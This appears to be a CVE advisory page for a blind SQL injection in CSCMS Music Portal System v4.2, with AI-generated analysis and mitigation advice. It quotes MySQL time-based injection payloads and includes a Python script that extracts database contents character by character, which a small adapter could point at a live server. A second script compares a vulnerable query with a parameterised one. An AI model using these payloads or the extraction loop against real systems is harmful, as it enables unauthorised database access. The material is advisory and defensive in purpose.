CVE-2022-29686
Description
CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/lists/zhuan.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CSCMS Music Portal System v4.2 contains a blind SQL injection in the `/admin.php/singer/admin/lists/zhuan` endpoint via the `id` parameter, allowing authenticated admin users to extract database contents.
Vulnerability
A blind SQL injection vulnerability exists in singer_Lists.php_zhuan within CSCMS Music Portal System v4.2. The id parameter, submitted as an array (id[]) in a POST request to /admin.php/singer/admin/lists/zhuan, is placed into a SQL query without validation or parameter binding, so an attacker controls part of the query text [1]. The vulnerable code path is reached by logging in as an administrator, creating a singer, and then issuing the request with the crafted id[] value [1].
Exploitation
An attacker must first authenticate as an administrator and add a singer. A POST request to /admin.php/singer/admin/lists/zhuan with a crafted id[] value such as id[]=(sleep(5)) then takes measurably longer to return, which confirms time-based blind SQL injection: the page shows nothing from the query, so the response delay is the only signal [1]. To extract data one character at a time, the attacker sends conditional payloads such as (case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end), which sleeps only when the selected character has the guessed ASCII value (99 is 'c'); by stepping the position and the compared value, the attacker reconstructs the database name, and by changing the inner SELECT, any other value the database user can read [1]. The sleep(), ascii() and substr(... from ... for ...) functions in the published payload are MySQL syntax.
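The extraction loop the paragraph describes, as an added example that is not code from the report or from cscms. It reuses the payload shape quoted above, but generalises it: instead of testing one ASCII value per request with "=", it uses ">" comparisons and a binary search, so each character costs about seven requests instead of up to ninety-five. The HTTP round-trip is replaced by a simulated oracle that evaluates the injected CASE against a constructed database name, so the block runs offline; timing_oracle shows how the same loop would be driven by a real request function (assumed, not provided).

```python
import re
import time

# Constructed stand-in for what the real database would return for
# select(database()); the simulated oracle "knows" it, a real target does not.
SIMULATED_DATABASE_NAME = "cscms"
DELAY_SECONDS = 5


def build_payload(position, ascii_value, op="="):
    """Value to submit as id[]: sleeps only when the comparison holds.

    Same shape as the payload in the report; op may be '=' (as published)
    or '>' (used here for the binary search)."""
    return (
        "(case(1)when(ascii(substr((select(database()))from(%d)for(1)))%s%d)"
        "then(sleep(%d))else(1)end)" % (position, op, ascii_value, DELAY_SECONDS)
    )


_PAYLOAD_RE = re.compile(r"from\((\d+)\)for\(1\)\)\)([=>])(\d+)\)then\(sleep")


def simulated_oracle(payload):
    """Stand-in for the vulnerable endpoint: evaluate the injected CASE
    against SIMULATED_DATABASE_NAME and report whether it would have slept."""
    m = _PAYLOAD_RE.search(payload)
    if not m:
        raise ValueError("unexpected payload shape")
    pos, op, value = int(m.group(1)), m.group(2), int(m.group(3))
    # MySQL substr(... from N for 1) is 1-indexed and yields '' past the end;
    # ascii('') is 0, which the extraction loop uses as the terminator.
    ch = SIMULATED_DATABASE_NAME[pos - 1] if pos <= len(SIMULATED_DATABASE_NAME) else ""
    actual = ord(ch) if ch else 0
    return actual == value if op == "=" else actual > value


def timing_oracle(send, threshold=DELAY_SECONDS - 1):
    """Turn a request function into a boolean oracle by timing it.
    send(payload) is a hypothetical callable that POSTs id[]=payload and
    returns when the response arrives; it is not defined in this example."""
    def oracle(payload):
        start = time.monotonic()
        send(payload)
        return time.monotonic() - start >= threshold
    return oracle


def extract_char(oracle, position):
    """Binary-search one character's code in the printable range 32..126.
    Returns '' when the string has ended (ascii of '' is 0 in MySQL)."""
    if not oracle(build_payload(position, 0, ">")):
        return ""
    lo, hi = 32, 126  # assumption: identifier characters are printable ASCII
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_payload(position, mid, ">")):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(oracle, max_len=64):
    """Read characters left to right until the oracle reports the end."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(oracle, pos)
        if ch == "":
            break
        out += ch
    return out


if __name__ == "__main__":
    print(extract_string(simulated_oracle))
```

Against a live target the threshold in timing_oracle must sit well above normal response jitter, and repeated measurements are needed before trusting a single slow response; the simulated oracle has no such noise.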
Impact
A successful blind SQL injection lets an attacker who already holds an administrator account read data from the database that the application never displays, such as the database name, table structures and potentially stored user credentials, leading to information disclosure and a foothold for further compromise [1]. Because the admin login is a precondition, the practical effect is escalation from CMS administration to direct read access over everything the application's database user can query.
Mitigation
As of the published references, no patch has been released for CSCMS Music Portal System v4.2 [1]. Until one is available, restrict administrative access to trusted personnel, treat every element of the id[] array as an integer (cast it, or reject anything that is not a digit string) and bind it as a query parameter rather than concatenating it into the SQL text, and monitor for updates from the vendor.
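The weak pattern next to the hardened one, as an added example that is not cscms's code (the project is PHP; this is a Python and SQLite model of the same query shape, with a constructed singer table). The vulnerable function concatenates the id[] values into the IN list, so an attacker-controlled element rewrites the WHERE clause; the hardened function rejects anything that is not a digit string and binds each value as a parameter.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the singer list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE singer (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO singer VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn


def select_vulnerable(conn, ids):
    """Mirrors the weak pattern: id[] values pasted into the SQL text."""
    sql = ("SELECT name FROM singer WHERE id IN (" + ",".join(ids) +
           ") ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def select_hardened(conn, ids):
    """Every id[] element must be a digit string; each is bound as a
    parameter, so the query text never contains attacker input."""
    clean = []
    for v in ids:
        if not isinstance(v, str) or not v.isdigit():
            raise ValueError("id must be a non-negative integer: %r" % (v,))
        clean.append(int(v))
    placeholders = ",".join("?" * len(clean))
    sql = "SELECT name FROM singer WHERE id IN (%s) ORDER BY id" % placeholders
    return [row[0] for row in conn.execute(sql, clean)]


def rejects(conn, ids):
    """True if the hardened path refuses the input instead of running it."""
    try:
        select_hardened(conn, ids)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # An element that closes the IN list and appends its own condition: the
    # attacker's condition now decides which rows come back, which is exactly
    # the boolean oracle a blind injection needs.
    payload = ["1) OR (1=1"]
    print("vulnerable:", select_vulnerable(db, payload))
    print("hardened rejects payload:", rejects(db, payload))
    print("hardened normal use:", select_hardened(db, ["1", "3"]))
```

SQLite has no sleep() function, so the time-based payload from the report is not reproduced here; the boolean variant shown makes the same point, that concatenation lets the caller decide the query's logic, and the parameterised version closes it regardless of which injection flavour is used.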
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- CSCMS / Music Portal System
- Range: = 4.2
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
[1] https://github.com/chshcms/cscms/issues/29 (MITRE, x_refsource_MISC)
News mentions
No linked articles in our index yet.